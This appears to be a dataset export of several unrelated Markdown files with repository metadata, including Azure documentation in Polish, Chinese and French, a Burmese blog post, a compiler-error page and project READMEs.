Microsoft Azure umożliwia utworzenie co najmniej jednego klastra rozproszonego serwera obliczeniowego MATLAB w celu uruchamiania równoległych obciążeń MATLAB intensywnie korzystających z mocy obliczeniowej. Zainstaluj oprogramowanie MATLAB Distributed Computing Server na maszynie Wirtualnej, aby używać go jako obrazu podstawowego, i użyj szablonu szybkiego startu platformy Azure lub skryptu programu Azure PowerShell (dostępnego w [usłudze GitHub)](https://github.com/Azure/azure-quickstart-templates/tree/master/matlab-cluster)do wdrażania klastra i zarządzania nim. Po wdrożeniu połącz się z klastrem, aby uruchomić obciążenia. ## <a name="about-matlab-and-matlab-distributed-computing-server"></a>Informacje o matlab i matlab rozproszonego serwera obliczeniowego Platforma [MATLAB](https://www.mathworks.com/products/matlab/) jest zoptymalizowana pod kątem rozwiązywania problemów inżynieryjnych i naukowych. Użytkownicy MATLAB z symulacjami na dużą skalę i zadaniami przetwarzania danych mogą korzystać z równoległych produktów obliczeniowych MathWorks, aby przyspieszyć swoje obciążenia wymagające obliczeniowe, korzystając z klastrów obliczeniowych i usług sieciowych. [Parallel Computing Toolbox](https://www.mathworks.com/products/parallel-computing/) umożliwia użytkownikom MATLAB równoległość aplikacji i korzystanie z procesorów wielordzeniowych, procesorów graficznych i klastrów obliczeniowych. [Matlab Distributed Computing Server](https://www.mathworks.com/products/distriben/) umożliwia użytkownikom MATLAB korzystanie z wielu komputerów w klastrze obliczeniowym. Korzystając z maszyn wirtualnych platformy Azure, można utworzyć klastry serwerów przetwarzania rozproszonego MATLAB, które mają wszystkie te same mechanizmy dostępne do przesyłania pracy równoległej jako klastry lokalne, takie jak zadania interaktywne, zadania wsadowe, zadania niezależne i komunikacja Zadania. Korzystanie z platformy Azure w połączeniu z platformą MATLAB ma wiele zalet w porównaniu z inicjowania obsługi administracyjnej i przy użyciu tradycyjnego sprzętu lokalnego: zakres rozmiarów maszyn wirtualnych, tworzenie klastrów na żądanie, dzięki czemu płacisz tylko za zasoby obliczeniowe, których używasz, i możliwość testowania modeli na dużą skalę. ## <a name="prerequisites"></a>Wymagania wstępne * **Komputer kliencki** — do komunikowania się z platformą Azure i klastrem serwera przetwarzania rozproszonego MATLAB po wdrożeniu potrzebny jest komputer kliencki z systemem Windows. * **Program Azure PowerShell** — zobacz [Jak zainstalować i skonfigurować program Azure PowerShell,](/powershell/azure/overview) aby zainstalować go na komputerze klienckim. * **Subskrypcja platformy Azure** — jeśli nie masz subskrypcji, możesz utworzyć [bezpłatne konto](https://azure.microsoft.com/free/) w ciągu zaledwie kilku minut. W przypadku większych klastrów należy wziąć pod uwagę subskrypcję płatności zgodnie z rzeczywistymu polub lub inne opcje zakupu. * **Przydział procesorów wirtualnych** — może być konieczne zwiększenie przydziału procesora wirtualnego w celu wdrożenia dużego klastra lub więcej niż jednego klastra rozproszonego serwera obliczeniowego MATLAB. Aby zwiększyć przydział, [otwórz żądanie obsługi klienta online](https://azure.microsoft.com/blog/2014/06/04/azure-limits-quotas-increase-requests/) bez żadnych opłat. * **Licencje MATLAB, Parallel Computing Toolbox i MATLAB Distributed Computing Server** — skrypty zakładają, że [Menedżer licencji hostowanych MathWorks](https://www.mathworks.com/help/install/license-management.html) jest używany dla wszystkich licencji. * **Oprogramowanie MATLAB Distributed Computing Server** — zostanie zainstalowane na maszynie wirtualnej, która będzie używana jako podstawowy obraz maszyny Wirtualnej dla maszyn wirtualnych klastra. ## <a name="high-level-steps"></a>Kroki wysokiego poziomu Aby używać maszyn wirtualnych platformy Azure dla klastrów serwerów przetwarzania rozproszonego MATLAB, wymagane są następujące kroki wysokiego poziomu. Szczegółowe instrukcje znajdują się w dokumentacji dołączonej do szablonu szybkiego startu i skryptów na [GitHub](https://github.com/Azure/azure-quickstart-templates/tree/master/matlab-cluster). 1. **Tworzenie podstawowego obrazu maszyny Wirtualnej** * Pobierz i zainstaluj oprogramowanie MATLAB Distributed Computing Server na tej maszynie wirtualnej. > [!NOTE] > Ten proces może potrwać kilka godzin, ale wystarczy zrobić to tylko raz dla każdej wersji MATLAB, której używasz. > > 2. **Tworzenie jednego lub większej liczby klastrów** * Użyj dostarczonego skryptu programu PowerShell lub użyj szablonu szybkiego startu, aby utworzyć klaster z podstawowego obrazu maszyny Wirtualnej. * Zarządzanie klastrami przy użyciu dostarczonego skryptu programu PowerShell, który umożliwia wyświetlanie, wstrzymywanie, wznawianie i usuwanie klastrów. ## <a name="cluster-configurations"></a>Konfiguracje klastra Obecnie skrypt i szablon tworzenia klastra umożliwiają utworzenie pojedynczej topologii serwera przetwarzania rozproszonego MATLAB. Jeśli chcesz, utwórz jeden lub więcej dodatkowych klastrów, z każdego klastra o innej liczbie maszyn wirtualnych procesu roboczego, przy użyciu różnych rozmiarów maszyn wirtualnych i tak dalej. ### <a name="matlab-client-and-cluster-in-azure"></a>Klient i klaster MATLAB na platformie Azure Węzeł klienta MATLAB, węzeł harmonogram zadań MATLAB i węzły "roboczy" serwera przetwarzania rozproszonego MATLAB są skonfigurowane jako maszyny wirtualne platformy Azure w sieci wirtualnej, jak pokazano na poniższym rysunku. * Aby użyć klastra, połącz się za pomocą pulpitu zdalnego z węzłem klienta. Węzeł klienta uruchamia klienta MATLAB. * Węzeł klienta ma udział plików, do który mogą uzyskiwać dostęp wszyscy pracownicy. * MathWorks Hosted License Manager służy do sprawdzania licencji dla całego oprogramowania MATLAB. * Domyślnie na maszynach wirtualnych procesu roboczego procesu roboczego procesu roboczego obliczeń rozproszonych MATLAB tworzony jest jeden pracownik przetwarzania rozproszonego MATLAB na procesor wirtualny, ale można określić dowolną liczbę. ## <a name="use-an-azure-based-cluster"></a>Korzystanie z klastra opartego na platformie Azure Podobnie jak w przypadku innych typów klastrów serwerów przetwarzania rozproszonego MATLAB, aby utworzyć profil klastra harmonogramu zadań MATLAB, należy użyć Menedżera profilu klastra na kliencie MATLAB (na maszynie wirtualnej klienta). ![Menedżer profilu klastra](./media/matlab-mdcs-cluster/cluster_profile_manager.png) ## <a name="next-steps"></a>Następne kroki * Aby uzyskać szczegółowe instrukcje dotyczące wdrażania klastrów serwerów przetwarzania rozproszonego MATLAB i zarządzania nimi na platformie Azure, zobacz repozytorium [GitHub](https://github.com/Azure/azure-quickstart-templates/tree/master/matlab-cluster) zawierające szablony i skrypty. * Przejdź do [witryny MathWorks,](https://www.mathworks.com/) aby uzyskać szczegółową dokumentację dla MATLAB i MATLAB Distributed Computing Server.
107.76
813
0.828879
pol_Latn
0.999675
5391747b43459351afa1cfdbd1a7a1e0d33f358d
4,911
md
Markdown
articles/security-center/security-center-alerts-overview.md
cedarkuo/azure-docs.zh-tw
35578e41dc1bd28a8859b2dcc02f71c8c5b26f90
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security-center/security-center-alerts-overview.md
cedarkuo/azure-docs.zh-tw
35578e41dc1bd28a8859b2dcc02f71c8c5b26f90
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security-center/security-center-alerts-overview.md
cedarkuo/azure-docs.zh-tw
35578e41dc1bd28a8859b2dcc02f71c8c5b26f90
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Azure 資訊安全中心中的安全性警示 |Microsoft Docs description: 本主題說明哪些安全性警示,以及 Azure 資訊安全中心中可用的不同類型。 services: security-center documentationcenter: na author: memildin manager: rkarlin ms.assetid: 1b71e8ad-3bd8-4475-b735-79ca9963b823 ms.service: security-center ms.topic: conceptual ms.date: 03/15/2020 ms.author: memildin ms.openlocfilehash: 697c038a2fefdde8e488dad23a4e38e0b2b7b288 ms.sourcegitcommit: 849bb1729b89d075eed579aa36395bf4d29f3bd9 ms.translationtype: MT ms.contentlocale: zh-TW ms.lasthandoff: 04/28/2020 ms.locfileid: "79415861" --- # <a name="security-alerts-in-azure-security-center"></a>Azure 資訊安全中心的安全性警示 在 Azure 資訊安全中心中,有許多不同的資源類型都有各種警示。 資訊安全中心會針對部署在 Azure 上的資源,以及部署在內部部署和混合式雲端環境中的資源,產生警示。 安全性警示會由「先進偵測」觸發,而且僅適用于 Azure 資訊安全中心的「標準」層級。 有免費試用版可用。 您可以在 [安全性原則](security-center-pricing.md)中升級定價層選取項目。 若要深入了解價格,請瀏覽 [資訊安全中心](https://azure.microsoft.com/pricing/details/security-center/) 頁面。 ## <a name="responding-to-todays-threats"></a>回應現今的威脅<a name="respond-threats"> </a> 威脅態勢在過去 20 年來已有重大變更。 在過去,公司通常只需要擔心個別攻擊者可能會想要看到「怎麼做」的網站遭到破壞。 現今的攻擊者更複雜且更井然有序。 他們通常會有特定的財務和策略性目標。 他們也有更多的資源可供利用,因為它們可能是由民族國家或組織型犯罪所資助。 這些不斷改變的現實會導致攻擊者排名中前所未有的專業等級。 他們不再對 Web 竄改感興趣。 他們現在對竊取資訊、財務帳戶和私人資料感興趣,這些都可以用來產生開放市場的現金,或利用特定的商務、政治或軍事地位。 相較於具有財務目標的攻擊者,破壞網路以便對基礎結構和人員造成傷害的攻擊者更加令人關切。 回應時,組織通常會部署各種點解決方案,而這類解決方案會藉由尋找已知的攻擊簽章,進而著重於防禦企業周邊或端點。 這些解決方案通常會產生大量的低精確度警示,其需要資訊安全分析師進行分級和調查。 大部分的組織沒有回應這些警示所需的時間和專業知識 – 這麼多警示尚未解決。 此外,攻擊者也演變了其方法來破壞許多以簽章為基礎的防禦措施,並[適應雲端環境](https://azure.microsoft.com/blog/detecting-threats-with-azure-security-center/)。 需要新的方法,才能更快速地找出新興威脅並加速偵測和回應。 ## <a name="what-are-security-alerts-and-security-incidents"></a>什麼是安全性警示和安全性事件? **警示**是當偵測到您資源的威脅時,資訊安全中心產生的通知。 資訊安全中心會排定優先順序並列出警示,以及快速調查問題所需的資訊。 資訊安全中心也提供如何修復攻擊的建議。 **安全性事件**是相關警示的集合,而不是個別列出每個警示。 資訊安全中心使用[雲端智慧警示相互關聯](security-center-alerts-cloud-smart.md),將不同的警示和低精確度信號相互關聯至安全性事件。 資訊安全中心會使用事件,為您提供攻擊活動和所有相關警示的單一觀點。 這個視圖可讓您快速瞭解攻擊者所採取的動作,以及受影響的資源。 如需詳細資訊,請參閱[雲端智慧警示相互關聯](security-center-alerts-cloud-smart.md)。 ## <a name="how-does-security-center-detect-threats"></a>資訊安全中心偵測到威脅的方式為何? <a name="detect-threats"> </a> Microsoft 資訊安全研究人員會持續監視威脅。 由於 Microsoft 在雲端和內部部署中的全球存在,因此可以存取大量的遙測。 各種不同的資料集集合可讓您探索其內部部署取用者和企業產品的新攻擊模式和趨勢,以及其線上服務。 因此,資訊安全中心可以在攻擊者發行新的和日益複雜的攻擊時,快速地更新其偵測演算法。 這種方法可協助您跟上瞬息萬變的威脅環境。 為了偵測真正的威脅並降低誤報,資訊安全中心會收集、分析及整合來自 Azure 資源和網路的記錄資料。 它也適用于已連線的合作夥伴解決方案,例如防火牆和端點保護解決方案。 資訊安全中心會分析這項資訊,通常會將來自多個來源的資訊相互關聯,以識別威脅。 ![資訊安全中心的資料收集和呈現](./media/security-center-alerts-overview/security-center-detection-capabilities.png) 資訊安全中心會運用進階安全性分析,其遠勝於以簽章為基礎的方法。 巨量資料和 [機器學習](https://azure.microsoft.com/blog/machine-learning-in-azure-security-center/) 技術突破可用來評估整個雲端網狀架構的事件 – 使用手動方式來偵測無法識別的威脅,以及預測攻擊的演化。 這些安全性分析包括︰ * **整合式威脅情報**: Microsoft 擁有大量的全球威脅情報。 遙測會從多個來源流入,例如 Azure、Office 365、Microsoft CRM Online、Microsoft Dynamics AX、outlook.com、MSN.com、Microsoft 數位犯罪防治中心 (DCU) 和 Microsoft 安全性回應中心 (MSRC)。 研究人員也會收到主要雲端服務提供者與其他協力廠商的摘要之間共用的威脅情報資訊。 Azure 資訊安全中心可以使用這項資訊來警示您來自已知不良執行者的威脅。 * **行為分析**:行為分析是一種技術,可分析及比較資料與已知模式的集合。 不過,這些模式並非簡單的簽章。 它們會透過已套用至大型資料集的複雜機器學習演算法來決定。 它們也能透過專業分析師仔細分析惡意行為來判定。 Azure 資訊安全中心可以使用行為分析,根據虛擬機器記錄、虛擬網路裝置記錄、網狀架構記錄、毀損傾印和其他來源的分析,來識別遭到入侵的資源。 * **異常偵測**: Azure 資訊安全中心也會使用異常偵測來識別威脅。 相較于行為分析(這取決於衍生自大型資料集的已知模式),異常偵測更加「個人化」,且著重于您的部署專用的基準。 機器學習服務適用於判斷您部署的正常活動,然後產生規則來定義可能代表安全性事件的極端狀況。 ## <a name="how-are-alerts-classified"></a>如何分類警示? 資訊安全中心會指派警示的嚴重性,協助您排定參與每個警示的順序,如此一來,當資源遭到入侵時,您就可以立即開始使用。 嚴重性是根據資訊安全中心在尋找中的信心,或用於發出警示的分析,以及導致警示的活動背後有惡意意圖的信賴等級。 > [!NOTE] > 在入口網站和早01-01-2019 的 REST API 版本中,警示嚴重性會以不同方式顯示。 如果您使用的是舊版的 API,請升級以取得一致的體驗,如下所述。 - **高:** 您的資源遭到入侵的機率很高。 您應立即加以了解。 資訊安全中心在不良意圖和用來發出警示的調查結果方面都具有高信賴度。 例如,偵測有已知惡意工具 (例如 Mimikatz,這是常用來竊取認證的工具) 正在執行的警示。 - **中:** 這可能是可疑的活動,可能表示資源遭到入侵。 資訊安全中心的分析或尋找方面的信心是「中」,而惡意的意圖是「中到高」的信心。 這些通常是機器學習或以異常為基礎的偵測。 例如,從異常位置進行的登入嘗試。 - **低:** 這可能是良性肯定或遭封鎖的攻擊。 * 資訊安全中心沒有足夠的信賴度可確定意圖是否屬惡意以及活動是否無害。 例如,清除記錄有可能是攻擊者為了嘗試隱藏其追蹤記錄而執行的動作,但在許多情況下,這也是管理員所執行的例行性作業。 * 資訊安全中心通常不會告訴您封鎖攻擊的時間,除非是我們建議您查看的有趣案例。 - **資訊:** 當您向下切入至安全性事件時,或使用具有特定警示識別碼的 REST API 時,您只會看到資訊警示。 事件通常由多個警示組成,其中有些警示單獨來看可能僅具參考價值,但若與其他警示交互參照,則可能有進一步詳查的價值。 ## <a name="continuous-monitoring-and-assessments"></a>持續監視和評量 Azure 資訊安全中心受益于在 Microsoft 中提供安全性研究和資料科學小組,以持續監視威脅環境中的變更。 這包括下列計劃︰ * **威脅情報監視**.. 威脅情報包含關於現有或新興威脅的機制、指標、影響和可採取動作的建議。 安全性社群會共用此資訊,而 Microsoft 會持續監視來自內部和外部來源的威脅情報摘要。 * **信號共用**:來自 Microsoft 廣泛雲端和內部部署服務、伺服器及用戶端端點裝置組合的安全性小組深入解析會進行共用和分析。 * **Microsoft 資訊安全專家**︰持續與擅長特殊資訊安全領域 (例如鑑識與 Web 攻擊偵測) 的 Microsoft 團隊攜手合作。 * **偵測微調**︰對真正的客戶資料集執行演算法,而資訊安全研究人員會與客戶一起驗證結果。 真肯定和誤判可用來縮小機器學習演算法的範圍。 這些結合的工作終於獲得在全新和改良的偵測中,您可以立即受益–您不需要採取任何動作。 ## <a name="next-steps"></a>後續步驟 在本文中,您已瞭解資訊安全中心中可用的各種警示類型。 如需詳細資訊,請參閱: * [Azure 資訊安全中心中的威脅防護](threat-protection.md)-針對顯示的安全性警示來源的簡短描述 Azure 資訊安全中心 * **Azure 活動記錄中的安全性警示**-除了在 Azure 入口網站或以程式設計方式提供時,也會在[azure 活動記錄](https://docs.microsoft.com/azure/azure-monitor/platform/activity-log-view)中將安全性警示和事件視為事件進行審核。 如需事件架構的詳細資訊,請參閱[Azure 活動記錄中的安全性警示](https://go.microsoft.com/fwlink/?linkid=2114113)
51.15625
262
0.822032
yue_Hant
0.979244
5391a452f2fb32df01ceececcb43f4d65a801a6b
1,296
md
Markdown
src/posts/2006-11-08-Flower-City.md
mgthantzin/gatsby-starter-default
fcf3eadeb2c64d23e5d2b3ed28755dfd7a4949d1
[ "MIT" ]
null
null
null
src/posts/2006-11-08-Flower-City.md
mgthantzin/gatsby-starter-default
fcf3eadeb2c64d23e5d2b3ed28755dfd7a4949d1
[ "MIT" ]
null
null
null
src/posts/2006-11-08-Flower-City.md
mgthantzin/gatsby-starter-default
fcf3eadeb2c64d23e5d2b3ed28755dfd7a4949d1
[ "MIT" ]
null
null
null
--- title: ပန်းမြို့တော် date: 2006-11-08T23:49:44+00:00 template: "post" draft: false slug: "flower-town/" category: "Note" tags: - "stress" - "Pyin Oo Lwin" - "May Myo" - "Mandalay" - "resort" description: "ဆယ်တန်းထဲက စိတ်ဖိစီးမှုတွေ၊ ပူပန်မှုတွေ၊ ဖိအားတွေနဲ့ တော်တော်လေး ခင်ခဲ့ရတယ်။ အခု စင်္ကာပူရောက်တော့ ပိုတောင်ဆိုးသေးတယ်။ အဲ့တော့ အမြဲတမ်း သောကကင်းတဲ့ Stressless State တစ်ခုကို ပိုင်ဆိုင်ချင်ခဲ့တယ်။ (သေခြင်းတရားက လွဲလို့ပေါ့လေ။)" --- ဆယ်တန်းထဲက စိတ်ဖိစီးမှုတွေ၊ ပူပန်မှုတွေ၊ ဖိအားတွေနဲ့ တော်တော်လေး ခင်ခဲ့ရတယ်။ အခု စင်္ကာပူရောက်တော့ ပိုတောင်ဆိုးသေးတယ်။ အဲ့တော့ အမြဲတမ်း သောကကင်းတဲ့ Stressless State တစ်ခုကို ပိုင်ဆိုင်ချင်ခဲ့တယ်။ (သေခြင်းတရားက လွဲလို့ပေါ့လေ။) မှတ်မှတ်ယယ၊ ကျွန်တော့်ဘဝမှာ အဲ့ဒီ ပန်းမြို့တော်လေးကို ရောက်တိုင်း သောကတွေ ဝေးရတယ်။ အဲ့ဒီမြို့လေးဟာ ခေတ်နောက်ကျကျန်ခဲ့တဲ့ တောမြို့လေးတစ်မြို့ မဟုတ်ပါဘူး။ ခေတ်မှီတဲ့ မြို့ပေါက်စလေးပါ။ ဒါပေမယ့် ဒေသခံတွေရဲ့ ဘဝက (မြို့ပြနဲ့ မတူပဲ) အရမ်းငြိမ်းချမ်းတဲ့ အသွင်ဆောင်ပါတယ်။ လောဘ၊ ဒေါသတွေ ကင်းနေတယ်လို့ ခံစားရတယ်။ အေးချမ်းတဲ့ တောင်ပေါ်မြို့လေးဟာ ကျွန်တော့်ဘဝကိုလည်း အေးချမ်းစေတာ အမှန်ပါပဲ။ ကျွန်တော်ဘယ်လောက် အဲ့ဒီမြို့လေးကို ချစ်လဲဆို ကျွန်တော့် နောက်ဆုံးဝင်သက်မှာ ရှုသွင်းလိုက်တဲ့ လေဟာ အဲ့ဒီမြို့ရဲ့လေအေးအေးလေပဲ ဖြစ်ချင်တယ်။ (ဘာမှန်းမသိတဲ့ ကျွန်တော့် Post ကို ဖတ်ပြီး အားလုံးနားလည်ပေးမယ်လို့ မျှော်လင့်ပါတယ်။ =P)
58.909091
301
0.42284
mya_Mymr
0.98811
5391f63c8d0dff1d231a0b0414cdfc8076ce96d0
249
md
Markdown
README.md
Ryxai/LADP
cfb340584267ceb8d4dce2b6ef0d191f2a030fea
[ "MIT" ]
null
null
null
README.md
Ryxai/LADP
cfb340584267ceb8d4dce2b6ef0d191f2a030fea
[ "MIT" ]
null
null
null
README.md
Ryxai/LADP
cfb340584267ceb8d4dce2b6ef0d191f2a030fea
[ "MIT" ]
null
null
null
# README This contains notes on papers from [CMPS290S-2018-09's reading list](http://composition.al/CMPS290S-2018-09/). Notes have been written using [Typora](https://typora.io/) and will render best there with the inline math setting turned on.
49.8
126
0.763052
eng_Latn
0.980564
5392b240d1bee38dabe30ff807c7ae90be0f6d30
178
md
Markdown
LJ-code301-day20.md
ClairJ/daily-learning-journals
2f01d0fcbf433a020bca3d168b9c5a945a210778
[ "MIT" ]
null
null
null
LJ-code301-day20.md
ClairJ/daily-learning-journals
2f01d0fcbf433a020bca3d168b9c5a945a210778
[ "MIT" ]
null
null
null
LJ-code301-day20.md
ClairJ/daily-learning-journals
2f01d0fcbf433a020bca3d168b9c5a945a210778
[ "MIT" ]
null
null
null
## LJ Code301-Day20 We met MVP and now we are all individually picking pieces of work we want to do and adding it to the project. Animations stretch goals such as a login page.
59.333333
157
0.775281
eng_Latn
0.999637
539470e169afd7d4c9cb3753efb7934d76b0e137
877
md
Markdown
docs/error-messages/compiler-errors-2/compiler-error-c3464.md
lc-soft/cpp-docs.zh-cn
cf307d328a2a9ed55de6f490b98e05e0f139fe5f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/error-messages/compiler-errors-2/compiler-error-c3464.md
lc-soft/cpp-docs.zh-cn
cf307d328a2a9ed55de6f490b98e05e0f139fe5f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/error-messages/compiler-errors-2/compiler-error-c3464.md
lc-soft/cpp-docs.zh-cn
cf307d328a2a9ed55de6f490b98e05e0f139fe5f
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 编译器错误 C3464 ms.date: 11/04/2016 f1_keywords: - C3464 helpviewer_keywords: - C3464 ms.assetid: 0ede05dc-4486-4921-8e8c-78ab5a2e09c5 ms.openlocfilehash: b21810d6df1fbfaf5ea94d9515487b16d00af548 ms.sourcegitcommit: 0ab61bc3d2b6cfbd52a16c6ab2b97a8ea1864f12 ms.translationtype: MT ms.contentlocale: zh-CN ms.lasthandoff: 04/23/2019 ms.locfileid: "62222327" --- # <a name="compiler-error-c3464"></a>编译器错误 C3464 “type”嵌套类型不能被转发 嵌套类型上不能进行类型转发。 有关详细信息,请参阅[类型转发 (C++/CLI)](../../extensions/type-forwarding-cpp-cli.md)。 ## <a name="example"></a>示例 下面的示例创建一个组件。 ``` // C3464.cpp // compile with: /LD /clr public ref class R { public: ref class N {}; }; ``` ## <a name="example"></a>示例 下面的示例生成 C3464。 ``` // C3464_b.cpp // compile with: /clr /c #using "C3464.dll" [assembly:TypeForwardedTo(R::N::typeid)]; // C3464 [assembly:TypeForwardedTo(R::typeid)]; // OK ```
18.659574
72
0.711517
yue_Hant
0.204358
53947d429d1ab75242afebdf96dc3379c94004b3
489
md
Markdown
README.md
kjoconnor/cabot-alert-slack
51dad1455ea849325ea6785b202f5e5305eb792e
[ "BSD-3-Clause" ]
10
2015-08-15T07:17:01.000Z
2020-07-31T13:06:12.000Z
README.md
kjoconnor/cabot-alert-slack
51dad1455ea849325ea6785b202f5e5305eb792e
[ "BSD-3-Clause" ]
3
2015-12-07T13:12:32.000Z
2016-09-30T10:52:49.000Z
README.md
kjoconnor/cabot-alert-slack
51dad1455ea849325ea6785b202f5e5305eb792e
[ "BSD-3-Clause" ]
7
2015-10-24T00:07:59.000Z
2021-04-08T11:08:24.000Z
# cabot-alert-slack A simple [Cabot] alerting plugin for [Slack]. It's intended as a general "alert log" and not as a primary source for on-call alerts, and as such it doesn't do anything with the duty roster or subscriptions. ## installation ``` # add the plugin to the list of enabled plugins CABOT_PLUGINS_ENABLED=...,cabot_alert_slack==1.0 SLACK_WEBHOOK_URL=https://... SLACK_ALERT_CHANNEL="#monitoring" ``` [Cabot]: https://github.com/arachnys/cabot [Slack]: https://slack.com/
25.736842
74
0.744376
eng_Latn
0.679376
53949a701ec447c6b87024368692b0ba0fc0f22f
2,329
md
Markdown
README.md
samrod777/Team-Generator-CLI
c03c827cd4aae17b6e6fa52dc52071f7937f0c67
[ "MIT" ]
null
null
null
README.md
samrod777/Team-Generator-CLI
c03c827cd4aae17b6e6fa52dc52071f7937f0c67
[ "MIT" ]
null
null
null
README.md
samrod777/Team-Generator-CLI
c03c827cd4aae17b6e6fa52dc52071f7937f0c67
[ "MIT" ]
null
null
null
# Team-Generator-CLI [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) ![Team Generator LCI](./lib/pictures/renderedHTML.png) --- ## Table of Contents - [About the Project](#About-the-Project) - [Getting Started](#Getting-Started) - [Installation](#Installation) - [Contributing](#Contributing) - [Testing](#Testing) - [License](#License) - [Demo](#Demo) ## About the Project This app allows the user to build a software engineering team by using a command line application. The application prompts the user for information about the team manager and then information about the team members. The user can input any number of team members, and they may be a mix of engineers and interns. When the user has completed building the team, the application will create an HTML file that displays a nicely formatted team roster based on the information provided by the user. ## Getting Started To get started, follow the Installation instructions. ### Installation Run the following command in your terminal to install required dependencies: npm install ## Testing Run the following command in your terminal to run the tests: npm test After the tests have passed you should see the following results: ![Team Generator LCI](./lib/pictures/TestsPassed.png) ## Contributing To contribute to this project contact Sam Rodriguez. Github Repository URL: https://github.com/samrod777/Team-Generator-CLI ## License This application is covered under the MIT license. ## Demo Once all of the dependencies have been installed, the user will be presented with a series of questions for the team manager and the option to choose the next member, as shown below: ![Team Generator LCI](./lib/pictures/addedManager.png) In this demo the next team member will be an ingeneer; once the user selects the engineer option the following questions will be asked and the option of selecting the next team member will be given: ![Team Generator LCI](./lib/pictures/addedEngineer.png) Lastly the intern option will be selected, and the team will be completed for this demo. ![Team Generator LCI](./lib/pictures/addedintern.png) For a brief video demo, visit the link below: https://drive.google.com/file/d/1mCAwQvpLcRLb-Fw2dweF91wpIZrRAeLe/view
42.345455
491
0.765135
eng_Latn
0.9951
5395772c19f9c34eec525e180dc06790b9bfa77e
6,790
md
Markdown
articles/fxt-edge-filer/node-password.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
1
2021-03-12T23:37:08.000Z
2021-03-12T23:37:08.000Z
articles/fxt-edge-filer/node-password.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/fxt-edge-filer/node-password.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 'Tutoriel : Initialiser le matériel - Azure FXT Edge Filer' description: Découvrez comment vous connecter au nœud matériel et définir un mot de passe initial sur des nœuds Azure FXT Edge Filer. author: femila ms.author: femila ms.service: fxt-edge-filer ms.topic: tutorial ms.date: 06/20/2019 ms.openlocfilehash: f78c7e60210d71aa94a20b4ce198a8d9d154a06f ms.sourcegitcommit: 106f5c9fa5c6d3498dd1cfe63181a7ed4125ae6d ms.translationtype: HT ms.contentlocale: fr-FR ms.lasthandoff: 11/02/2021 ms.locfileid: "131033016" --- # <a name="tutorial-set-hardware-passwords"></a>Tutoriel : Définir des mots de passe pour le matériel La première fois que vous mettez sous tension un nœud Azure FXT Edge Filer, vous devez définir un mot de passe d’utilisateur racine. Les nœuds de matériel ne sont pas livrés avec un mot de passe par défaut. Les ports réseau sont désactivés uniquement une fois que le mot de passe a été défini et que l’utilisateur racine s’est connecté. Effectuez cette étape après l’installation et le câblage du nœud, mais avant de créer le cluster. Ce tutoriel explique comment se connecter au nœud de matériel et définir le mot de passe. Il explique également comment ajouter un mot de passe de configuration du BIOS pour aider à sécuriser le nœud. Dans ce didacticiel, vous apprendrez à : > [!div class="checklist"] > > * Connecter un clavier et un moniteur au nœud et le mettre sous tension > * Définir un mot de passe de configuration du BIOS > * Définir des mots de passe pour l’utilisateur racine et le port iDRAC sur ce nœud > * Se connecter en tant qu’utilisateur racine Répétez ces étapes pour chaque nœud que vous utilisez dans votre cluster. Ce tutoriel prend environ 15 minutes. ## <a name="prerequisites"></a>Prérequis Avant de commencer ce tutoriel, procédez comme suit : * [Installez](install.md) chaque nœud Azure FXT Edge Filer dans un équipement monté en rack et associez les câbles d’alimentation et l’accès réseau comme décrit dans le [tutoriel précédent](network-power.md). * Trouvez un clavier connecté par USB et un moniteur VGA que vous pouvez attacher aux nœuds de matériel. (Le port série du nœud est inactif avant de définir le mot de passe). ## <a name="connect-a-keyboard-and-monitor-to-the-node"></a>Connecter un clavier et un moniteur au nœud Connectez physiquement un moniteur et un clavier au nœud Azure FXT Edge Filer. * Connectez le moniteur au port VGA. * Connectez le clavier à un des ports USB. Utilisez ce diagramme de référence pour localiser les ports à l’arrière du châssis. > [!NOTE] > Le port série est inactif tant qu’aucun mot de passe n’a été défini. ![diagramme montrant l’arrière d’Azure FXT Edge Filer avec les ports série, VGA et USB étiquetés](media/fxt-back-serial-vga-usb.png) Vous pouvez utiliser un commutateur KVM si vous souhaitez connecter plusieurs nœuds aux mêmes périphériques. Mettez sous tension le nœud en appuyant sur le bouton d’alimentation à l’avant. ![diagramme de l’avant du Azure FXT Edge Filer - le bouton d’alimentation arrondi est étiqueté en haut à droite](media/fxt-front-annotated.png) ## <a name="create-a-bios-setup-password"></a>Créer un mot de passe de configuration du BIOS Un mot de passe de configuration du BIOS protège les paramètres BIOS du nœud contre des modifications accidentelles ou non autorisées. Ce mot de passe n’est pas nécessaire pour créer un cluster, mais il est fortement recommandé dans le cadre de la stratégie de sécurité de votre cluster. Pour créer un mot de passe de configuration du BIOS : 1. Activez ou redémarrez le nœud, puis appuyez immédiatement sur F2 pour ouvrir l’utilitaire de configuration du système. 1. Dans l’écran **System Setup Main Menu** (Menu principal de la configuration système), choisissez **System BIOS** > **System Security**. 1. Assurez-vous que le paramètre **Password Status** (État du mot de passe) est **Unlocked** (Déverrouillé). 1. Utilisez le champ **Setup Password** pour définir le mot de passe. (Vous pouvez également définir un mot de passe BIOS système à partir de cet écran si vous souhaitez en utiliser un.) 1. Appuyez sur ÉCHAP pour revenir à l’écran **System BIOS**, puis appuyez de nouveau sur ÉCHAP. Un message vous demande d’enregistrer les modifications. Si le système ne redémarre pas automatiquement, redémarrez-le pour accéder à l’écran de démarrage normal.<!-- how to exit this mode/do you need to reboot to get to the initial setup screen? --> ## <a name="set-initial-passwords"></a>Définir des mots de passe initiaux Le nœud Azure FXT Edge Filer imprime différents messages sur le moniteur au démarrage. Après quelques instants, il affiche un écran de configuration initiale comme celui-ci : ``` ------------------------------------------------------ Microsoft FXT node initial setup ------------------------------------------------------ Password Setup --------------- Enter a password to set the iDRAC and temporary root password. Minimum password length is 8. NOTE: This does not set a BIOS setup password. For security, Microsoft 